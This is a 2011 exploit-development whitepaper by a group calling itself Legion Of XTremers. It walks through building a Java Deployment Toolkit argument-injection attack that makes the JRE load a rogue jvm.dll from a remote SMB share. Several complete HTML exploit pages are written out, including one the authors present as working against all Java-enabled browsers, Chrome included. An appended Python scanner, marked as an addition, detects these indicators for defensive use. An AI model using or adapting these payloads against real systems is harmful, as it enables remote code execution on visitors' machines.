
Alternative JVM Exploit - Exploiting JVM On Chrome

Posted Jan 5, 2011
Authored by Legion Of XTRemers

Whitepaper called Alternative JVM Exploit - Exploiting JVM On Chrome.

tags | paper
SHA-256 | 7e227fd602969d05eea978eafa822da092f7099bb8ce85f5bd1026d9c8aa97df

**ALTERNATIVE JVM EXPLOIT - EXPLOITING JVM ON CHROME - A STORY**

**RESEARCH TEAM: LEGION OF XTREMERS**

**SPECIAL GREETS TO: SECFENCE TEAM AND HACKERS GARAGE**


Note: This short paper is intended for wannabes who want a glance at the process an exploit goes through when a new vulnerability is released. I've chosen this vulnerability for the sake of simplicity, since every step of it is easy to understand distinctly.

Here I am presenting technical details about the Alternate JVM vulnerability and the development of its exploit for all web browsers on the market. This story takes place around April 2010.

In the afternoon (10-13-2010) everyone in the team was busy with the vulnerability in the Java Runtime Environment published on www.reversemode.com by Tavis Ormandy. So I decided to take a look and immediately downloaded all the JRE versions available to date from Java's site.

Note: By that time the latest update of the JRE was 6u19, which was also vulnerable, and Java was not treating this vulnerability as critical for Windows systems. The critical point was that every Windows system to date with Java installed was vulnerable to remote code execution.

The ActiveX control 8AD9C840-044E-11D1-B3E9-00805F499D93 and the DeploymentToolkit ActiveX control CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA were vulnerable. The vulnerability was that an attacker could force the JRE to load a DLL with a specific name from a remote SMB share as an alternate JVM.

I started testing, but everything failed. A DLL was prepared and placed in a shared folder, along with a web page. In the first ActiveX control mentioned above, the two parameters 'launchjnlp' and 'docbase' were vulnerable to undocumented argument passing. One of those drastic undocumented arguments was -J, which together with the -XXaltjvm option leads to my rogue DLL being loaded.

The attacking code looked like this:

<!-----------jvmtest.htm------------------->
<html>
<head></head>
<body>
JVM Testing
<HR>


<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0">
<PARAM name="launchjnlp" value="-J-XXaltjvm=\\ipaddress\share_folder_containing_jvm.dll_file">
<PARAM name="docbase" value="-J-XXaltjvm=\\ipaddress\share_folder_containing_jvm.dll_file">
</object>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
<!------------------------------>

But the attack failed and did not work as intended. So I opened a console and gave the command:

java /?

to check its arguments. I tried some other arguments too, and by accident I placed one of the
options right before "-J-XXaltjvm" and tried again. It threw an error:

Can not find \\ipaddress\share\jvm.dll\jvm.dll\jvm.dll

So by accident I now knew two things:

1. "-J-XXaltjvm" needs some junk to be prefixed first, like:

"abc -J-XXaltjvm"

2. It will automatically search for jvm.dll in the specified shared folder, so there is no need to specify jvm.dll.

Then I modified the above jvmtest.htm as follows.

Suppose you've placed the jvm.dll file in the \\ipaddress\share_folder folder; then:


<!-----------jvmtest.htm------------------->
<html>
<head></head>
<body>
JVM Testing
<HR>


<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0">
<PARAM name="launchjnlp" value="sd -J-XXaltjvm=\\ipaddress\share_folder">
<PARAM name="docbase" value="asd-J-XXaltjvm=\\ipaddress\share_folder">
</object>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
<!------------------------------>

Bingo. The DLL was fired. I got my code working, but wait: the above code was not working with all JRE versions, which meant I needed to develop something that would work with most of the web browsers on the market. The above code worked with JRE versions around 6u18 and 6u19.

The second ActiveX control listed above had a method named launch(parameter). The parameter of the launch function was the place for our argument injection. So I altered jvmtest.htm:

<!-----------jvmtest.htm------------------->
<html>
<head></head>
<body>
JVM Testing
<HR>


<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0">
<PARAM name="launchjnlp" value="sd -J-XXaltjvm=\\ipaddress\share_folder">
<PARAM name="docbase" value="asd-J-XXaltjvm=\\ipaddress\share_folder">
</object>

<script language=javascript>
var navig = navigator.appName.substring(0,5).toUpperCase();
var obj = document.createElement("OBJECT");

obj.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
if(navig != 'MICRO') {
obj.type = "application/npruntime-scriptable-plugin;DeploymentToolkit";
}
document.body.appendChild(obj);
obj.launch("http: -J-XXaltjvm=\\ipaddress\share");
</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
<!------------------------------>


Now the code worked with nearly all (most) of the JRE versions. But three or four days later Kaspersky researchers said that the Google Chrome web browser
was not vulnerable to such attacks. So it now seemed like a challenge for the whole security community. I too set about tackling it and discovered that JRE versions 6u18 and 6u19 could even be targeted with applet tags, without specifying the first ActiveX classid listed above.

But initially Chrome seemed to be immune to this trick too. Soon I realised that Chrome needs

src=""

And Google Chrome too fell into my hands.... ah, Kaspersky researchers, so many days of research, such huge teams, and so much of the best equipment. How (why) did Chrome escape....???


The following code was developed to kill all browsers on the market supporting Java, with the
latest version at that time (JRE 6u19):


<!-----------jvmtest.htm------------------->
<html>
<head></head>
<body>
JVM Testing
<HR>


<applet code="" codebase="" height="0" width="0">
<PARAM name="launchjnlp" value="hitoall -Xnosplash -J-XXaltjvm=\\ipaddress\share">
<PARAM name="docbase" value="sowhatsurplan -Xnosplash -J-XXaltjvm=\\ipaddress\share">
</applet>

<script language=javascript>
var navig = navigator.appName.substring(0,5).toUpperCase();
var obj = document.createElement("OBJECT");

obj.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
if(navig != 'MICRO') {
obj.type = "application/npruntime-scriptable-plugin;DeploymentToolkit";
}
document.body.appendChild(obj);
obj.launch("http: -J-XXaltjvm=\\ipaddress\share");
</script>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
<!------------------------------>
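As an added defensive example (not part of the paper, and not the authors' code), here is a small Python scanner that flags, in captured HTML or proxy logs, the indicators the story above describes: the two Deployment Toolkit CLSIDs, launchjnlp/docbase parameters carrying -J-XXaltjvm= with a UNC target (under either <object> or <applet>), and launch() calls with the same injection. The sample page and the address 192.0.2.10 are constructed for the test.

```python
import re
from html.parser import HTMLParser
# Indicators from the paper: the two Deployment Toolkit CLSIDs, the injectable
# launchjnlp/docbase parameters, the launch() method, and -J-XXaltjvm=\\host\share.
JDT_CLSIDS = {"8AD9C840-044E-11D1-B3E9-00805F499D93", "CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"}
INJECTED_PARAMS = {"launchjnlp", "docbase"}
ALTJVM_RE = re.compile(r"-J-XXaltjvm=(\\\\[^\s\"'>]+)", re.IGNORECASE)
LAUNCH_RE = re.compile(r"\.launch\(\s*[\"']([^\"']*)[\"']", re.IGNORECASE)
CLSID_RE = re.compile(r"clsid:([0-9A-F-]{36})", re.IGNORECASE)

class JdtScanner(HTMLParser):
    # Collects (kind, value) findings; <object> and <applet> carriers are treated alike.
    def __init__(self):
        super().__init__()
        self.findings, self._in_script = [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":  # <object classid="clsid:..."> naming a Deployment Toolkit control
            clsid = a.get("classid", "").upper().replace("CLSID:", "")
            if clsid in JDT_CLSIDS:
                self.findings.append(("jdt-clsid", clsid))
        elif tag == "param" and a.get("name", "").lower() in INJECTED_PARAMS:
            for unc in ALTJVM_RE.findall(a.get("value", "")):  # any junk prefix is ignored
                self.findings.append(("altjvm-param", unc))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):  # script bodies: obj.classid = "clsid:..." / obj.launch("...")
        if not self._in_script:
            return
        for clsid in CLSID_RE.findall(data):
            if clsid.upper() in JDT_CLSIDS:
                self.findings.append(("jdt-clsid", clsid.upper()))
        for arg in LAUNCH_RE.findall(data):
            for unc in ALTJVM_RE.findall(arg):
                self.findings.append(("altjvm-launch", unc))

def scan_html(html):
    scanner = JdtScanner()  # returns the list of (kind, value) findings for one document
    scanner.feed(html)
    return scanner.findings

# Constructed sample modelled on the paper's third test page; 192.0.2.10 is a placeholder.
SAMPLE_HTML = r"""<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93">
<PARAM name="launchjnlp" value="sd -J-XXaltjvm=\\192.0.2.10\share_folder">
<PARAM name="docbase" value="asd-J-XXaltjvm=\\192.0.2.10\share_folder"></object>
<script>var obj = document.createElement("OBJECT"); obj.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
document.body.appendChild(obj); obj.launch("http: -J-XXaltjvm=\\192.0.2.10\share");</script>"""
```

Any UNC value reported here is also the SMB destination a host would reach out to, so the same findings can be correlated with outbound 445/139 connections in firewall logs.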


"Legion Of Xtremers: Security, Penetration, Virology"